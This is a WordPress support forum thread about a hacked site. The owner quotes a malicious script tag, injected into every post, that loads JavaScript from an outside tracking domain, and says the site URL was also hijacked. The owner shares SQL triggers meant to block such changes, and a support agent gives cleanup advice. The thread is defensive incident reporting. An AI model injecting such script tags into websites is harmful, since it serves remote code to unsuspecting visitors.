Support » Plugin: Wordfence Security - Firewall & Malware Scan » Siteurl hacked to redirect to another site

  • Resolved ahall41

    (@ahall41)


    A similar issue was posted 11 months ago (now closed). Our site url was hacked to point at https://track.beforwardplay.com/track/zls.js?foup. Also every post had this script appended (several times):
    <script src='https://track.beforwardplay.com/track/pystats.js?l=l&' type=text/javascript language=javascript></script>

    I’ve cleaned this up via phpMyAdmin (and added some triggers to the tables to prevent it happening) – just wondering why WordFence hasn’t picked this up or prevented it …

    Thanks

Viewing 4 replies - 1 through 4 (of 4 total)
  • ahall41

    (@ahall41)

    I added the following triggers.

    CREATE TRIGGER trg_update_wp_options BEFORE UPDATE ON wp_options
      FOR EACH ROW
         IF (NEW.option_id IN (1,2)) THEN
    	   SIGNAL SQLSTATE '45000' SET MESSAGE_TEXT = 'Cannot update locked record';
    	 END IF
    /
    
    CREATE TRIGGER trg_update_wp_posts BEFORE UPDATE ON wp_posts
      FOR EACH ROW
         IF (NEW.post_content LIKE '%<script%>%') THEN
    	   SIGNAL SQLSTATE '45000' SET MESSAGE_TEXT = 'Script not allowed in post';
    	 END IF;
    /

    Just need to see if anything appears in error.log

    Not sure if this is significant, but I’ve detected a user wordpressssadmin (wordpressssadmin@test.com) role=None. Now removed.
    Also we’ve been having quite a few login attempts using real admin usernames. Even though I’ve changed them, the new names are appearing in the failed attempts list. ” Prevent discovery of usernames through ‘/?author=N’ scans, the oEmbed API, and the WordPress REST API” is ticked, and the IDs don’t appear in a posts or pages that I can see. Which makes me suspect something is acting from the inside?

    Plugin Support WFGerroald

    (@wfgerald)

    Hey @ahall41,

    Wordfence protects against a vast variety of attacks. Whether you were hacked because of an unknown attack method or because there is some other issue in your system is hard to say. Some plugins contain vulnerabilities that are so bad that Wordfence can’t protect against them. The same goes for servers.

    It does sound like the site is compromised. I’d suggest updating all passwords including WordPress, sFTP, hosting control panel, and database.

    You can use the guide below to further comb the site. But if the issue or any other oddities return I’d suggest reaching out to a professional hack repair service to have the site cleaned and patched.

    https://www.wordfence.com/docs/how-to-clean-a-hacked-wordpress-site-using-wordfence/

    Thanks,

    Gerroald

    Thanks for the reply. I suspect we may have been hacked before we installed Wordfence … all the plugins we have now seem to be respectable. The spurious user has been removed – only 3 have access to create/update posts. All we can do is wait and see (except I think I should also add a trigger to prevent creating posts with <script> tags.

Viewing 4 replies - 1 through 4 (of 4 total)
  • You must be logged in to reply to this topic.